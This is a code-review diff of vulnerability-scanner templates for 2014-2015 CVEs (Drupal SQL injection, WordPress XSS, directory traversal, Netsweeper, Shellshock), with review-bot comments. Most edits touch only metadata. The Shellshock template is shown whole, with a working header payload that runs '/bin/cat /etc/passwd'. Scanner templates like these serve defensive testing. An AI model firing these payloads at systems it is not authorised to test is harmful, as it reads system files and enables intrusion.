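Review bot: The added NVD reference `https://nvd.nist.gov/vuln/detail/CVE-2014-2962l` carries a stray trailing `l`, so the link resolves to a non-existent entry. It should read `- https://nvd.nist.gov/vuln/detail/CVE-2014-2962`, matching the `cve-id` a few lines below. The other new reference, the CERT/CC note, looks correctly formed.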


@ -5,11 +5,14 @@ info:
author: pikpikcu
severity: critical
description: |
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
reference:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
- https://www.elastic.co/blog/logstash-1-4-3-released
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
tags: cve,cve2014,elastic,rce,elasticsearch
classification:
cve-id: CVE-2014-3120
requests:
- raw:
@ -52,3 +55,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24


@ -33,3 +33,5 @@ requests:
part: interactsh_protocol
words:
- "http"
# Enhanced by mp on 2022/02/24


@ -1,16 +1,21 @@
id: CVE-2014-3704
info:
name: Drupal Sql Injetion
name: Drupal SQL Injection
author: princechaddha
severity: high
description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.
remediation: Upgrade to Drupal core 7.32 or later.
reference:
- https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql
- https://nvd.nist.gov/vuln/detail/CVE-2014-3704
- https://www.drupal.org/SA-CORE-2014-005
- http://www.exploit-db.com/exploits/34984
- http://www.exploit-db.com/exploits/34992
- http://www.exploit-db.com/exploits/34993
- http://www.exploit-db.com/exploits/35150
tags: cve,cve2014,drupal,sqli
classification:
cve-id: CVE-2014-3704
requests:
- method: POST
@ -30,3 +35,5 @@ requests:
- "e807f1fcf82d132f9bb018ca6738a19f"
condition: and
part: body
# Enhanced by mp on 2022/02/24


@ -3,8 +3,9 @@ id: CVE-2014-3744
info:
name: Node.js st module Directory Traversal
author: geeknik
description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3744
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
- https://snyk.io/vuln/npm:st:20140206
severity: high
@ -28,3 +29,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/24


@ -6,9 +6,12 @@ info:
severity: medium
tags: cve,cve2014,weblogic,oracle,ssrf,oast
reference:
- https://www.oracle.com/security-alerts/cpujul2014.html
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services."
description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
classification:
cve-id: CVE-2014-4210
requests:
- method: GET
@ -25,3 +28,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/02/24


@ -1,12 +1,14 @@
id: CVE-2014-4513
info:
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS)
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513
tags: cve,cve2014,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2014-4513
requests:
- method: GET
@ -28,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

@ -1,7 +1,7 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference:
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4535
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
description: "A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

@ -1,7 +1,7 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference:
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4536
cwe-id: CWE-79
description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter."
description: "Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter."
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

@ -1,7 +1,7 @@
id: CVE-2014-4539
info:
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: |
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4539
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
description: "A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
requests:
- method: GET
@ -34,4 +34,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/24

@ -1,10 +1,10 @@
id: CVE-2014-4544
info:
name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.
description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
reference:
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

@ -1,7 +1,7 @@
id: CVE-2014-4550
info:
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: |
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4550
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
description: "A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

@ -1,7 +1,7 @@
id: CVE-2014-4558
info:
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: |
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4558
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
description: "A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

@ -1,7 +1,7 @@
id: CVE-2014-4561
info:
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: |
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4561
cwe-id: CWE-79
description: "The ultimate-weather plugin 1.0 for WordPress has XSS"
description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

@ -1,7 +1,7 @@
id: CVE-2014-4592
info:
name: WP Planet <= 0.1 - Unauthenticated Reflected XSS
name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: |
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4592
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter."
description: "A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter."
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

@ -5,8 +5,10 @@ info:
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
reference: https://www.cvedetails.com/cve/CVE-2014-4940
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4940
tags: cve,cve2014,wordpress,wp-plugin,lfi
classification:
cve-id: CVE-2014-4940
requests:
- method: GET
@ -23,3 +25,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

@ -7,8 +7,10 @@ info:
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
reference: |
- https://www.exploit-db.com/exploits/39351
- https://www.cvedetails.com/cve/CVE-2014-5111
- https://nvd.nist.gov/vuln/detail/CVE-2014-5111
tags: cve,cve2014,lfi,trixbox
classification:
cve-id: CVE-2014-5111
requests:
- method: GET
@ -25,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

@ -4,11 +4,13 @@ info:
name: webEdition 6.3.8.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-5258
- https://www.exploit-db.com/exploits/34761
- https://www.cvedetails.com/cve/CVE-2014-5258
tags: cve,cve2014,lfi
classification:
cve-id: CVE-2014-5258
requests:
- method: GET
@ -24,4 +26,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/25

@ -4,11 +4,14 @@ info:
name: WordPress Plugin WP Content Source Control - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-5368
- https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368
tags: cve,cve2014,wordpress,wp-plugin,lfi
classification:
cve-id: CVE-2014-5368
requests:
- method: GET
@ -27,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

@ -1,44 +1,49 @@
id: CVE-2014-6271
info:
name: Shellshock
author: pentest_swissky
severity: critical
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
reference:
- http://www.kb.cert.org/vuls/id/252743
- http://www.us-cert.gov/ncas/alerts/TA14-268A
tags: cve,cve2014,rce
id: CVE-2014-6271
info:
name: ShellShock
author: pentest_swissky
severity: critical
description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-6271
- https://nvd.nist.gov/vuln/detail/CVE-2014-7169
- http://www.kb.cert.org/vuls/id/252743
- http://www.us-cert.gov/ncas/alerts/TA14-268A
tags: cve,cve2014,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2014-6271
cwe-id: CWE-78
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/cgi-bin/status"
- "{{BaseURL}}/cgi-bin/stats"
- "{{BaseURL}}/cgi-bin/test"
- "{{BaseURL}}/cgi-bin/status/status.cgi"
- "{{BaseURL}}/test.cgi"
- "{{BaseURL}}/debug.cgi"
- "{{BaseURL}}/cgi-bin/test-cgi"
headers:
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/cgi-bin/status"
- "{{BaseURL}}/cgi-bin/stats"
- "{{BaseURL}}/cgi-bin/test"
- "{{BaseURL}}/cgi-bin/status/status.cgi"
- "{{BaseURL}}/test.cgi"
- "{{BaseURL}}/debug.cgi"
- "{{BaseURL}}/cgi-bin/test-cgi"
headers:
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/02/25
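Review bot: The new reference list adds the NVD entry for CVE-2014-7169, but the only payload the template sends is the original `() { ignored; }; …` form in the `Shellshock`, `Referer` and `Cookie` headers, which does not exercise the CVE-2014-7169 incomplete-fix bypass, so a host patched for 6271 but not 7169 would be reported clean. Either drop that link or state the limitation next to the payload, e.g. `# NOTE: only the CVE-2014-6271 injection form is sent; the CVE-2014-7169 bypass is not tested.` The section prints the whole file twice, which looks like a reindent rather than a logic change, so the request paths and matchers themselves appear unchanged.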

@ -4,9 +4,13 @@ info:
name: Osclass Security Advisory 3.4.1 - Local File Inclusion
author: daffainfo
severity: high
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
reference:
- https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
- https://nvd.nist.gov/vuln/detail/CVE-2014-6308
tags: cve,cve2014,lfi
description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php."
description: "A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php."
classification:
cve-id: CVE-2014-6308
requests:
- method: GET
@ -23,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

@ -5,8 +5,8 @@ info:
author: dhiyaneshDK
severity: high
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
remediation: Upgrade to a supported version of Gog.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8682
- http://seclists.org/fulldisclosure/2014/Nov/33
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
@ -38,4 +38,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/04
# Enhanced by mp on 2022/02/25
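Review bot: The remediation text reads `Upgrade to a supported version of Gog.` where the product is Gogs; change it to `remediation: Upgrade to a supported version of Gogs.` The description already names the fixed release (0.5.6.1105 Beta), so the remediation could cite that instead of the vaguer "supported version". The first hunk has equal old and new line counts, so which line was replaced is not visible here, but the typo is on the side that remains.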

@ -4,11 +4,14 @@ info:
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8799
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
tags: cve,cve2014,wordpress,wp-plugin,lfi
classification:
cve-id: CVE-2014-8799
requests:
- method: GET
@ -29,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

@ -1,12 +1,14 @@
id: CVE-2014-9094
info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
description: "Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,cve2014,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2014-9094
requests:
- method: GET
@ -27,3 +29,7 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25
# Enhanced by mp on 2022/02/25
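Review bot: The `# Enhanced by mp on 2022/02/25` trailer is added twice at the end of this file (the hunk grows from 3 to 7 lines and both comment lines are visible); keep a single copy. It is harmless to the parser but is noise in every future diff of this file.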

@ -1,14 +1,16 @@
id: CVE-2014-9444
info:
name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)
name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting
author: daffainfo
severity: medium
description: The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.
description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
reference:
- https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
- https://nvd.nist.gov/vuln/detail/CVE-2014-9444
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cve-id: CVE-2014-9444
requests:
- method: GET
@ -30,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25
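Review bot: The rewritten description now says the plugin `prior to v.0.9.2` is affected while the `name` still reads `Frontend Uploader <= 0.9.2`, so the two lines disagree on whether 0.9.2 itself is vulnerable. Check the advisory and align both, e.g. `name: Frontend Uploader < 0.9.2 - Unauthenticated Cross-Site Scripting` if 0.9.2 is the fixed release, or `prior to v.0.9.3` in the description if it is not.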

@ -1,10 +1,10 @@
id: CVE-2014-9606
info:
name: Netsweeper 4.0.8 - Cross Site Scripting Injection
name: Netsweeper 4.0.8 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.
description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9606
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

@ -1,10 +1,10 @@
id: CVE-2014-9607
info:
name: Netsweeper 4.0.4 - Cross Site Scripting Injection
name: Netsweeper 4.0.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9607
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

@ -1,10 +1,10 @@
id: CVE-2014-9608
info:
name: Netsweeper 4.0.3 - Cross Site Scripting Injection
name: Netsweeper 4.0.3 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9608
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

@ -4,7 +4,7 @@ info:
name: Netsweeper 4.0.8 - Directory Traversal
author: daffainfo
severity: medium
description: Directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.
description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9609
@ -29,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

@ -4,7 +4,7 @@ info:
name: Netsweeper 4.0.5 - Default Weak Account
author: daffainfo
severity: critical
description: The Web Panel in Netsweeper before 4.0.5 has a default password of branding for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9614
@ -42,3 +42,5 @@ requests:
part: header
words:
- 'Set-Cookie: webadminU='
# Enhanced by mp on 2022/02/25

@ -1,10 +1,10 @@
id: CVE-2014-9615
info:
name: Netsweeper 4.0.4 - Cross Site Scripting Injection
name: Netsweeper 4.0.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.
description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9615
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

@ -4,7 +4,7 @@ info:
name: Netsweeper 3.0.6 - Open Redirection
author: daffainfo
severity: medium
description: Netsweeper version 3.0.6 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability.
description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9617
@ -25,3 +25,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
# Enhanced by mp on 2022/02/25
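Review bot: The new description states the open redirect affects Netsweeper `before 4.0.5`, but the `name` line still reads `Netsweeper 3.0.6 - Open Redirection`, so a reader of the finding sees two different version claims. Update the name to the range the description now asserts, e.g. `name: Netsweeper < 4.0.5 - Open Redirection`. The regex matcher on the `Location` header is unchanged and still requires the `example.com` canary.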

@ -1,9 +1,11 @@
id: CVE-2015-5471
info:
name: Swim Team <= v1.44.10777 - Local File Inclusion
author: 0x_Akoko
severity: medium
description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files.
description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.
remediation: Upgrade to Swim Team version 1.45 or newer.
reference:
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
- http://www.vapid.dhs.org/advisory.php?v=134
@ -30,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/25

@ -0,0 +1,34 @@
id: CVE-2017-18598
info:
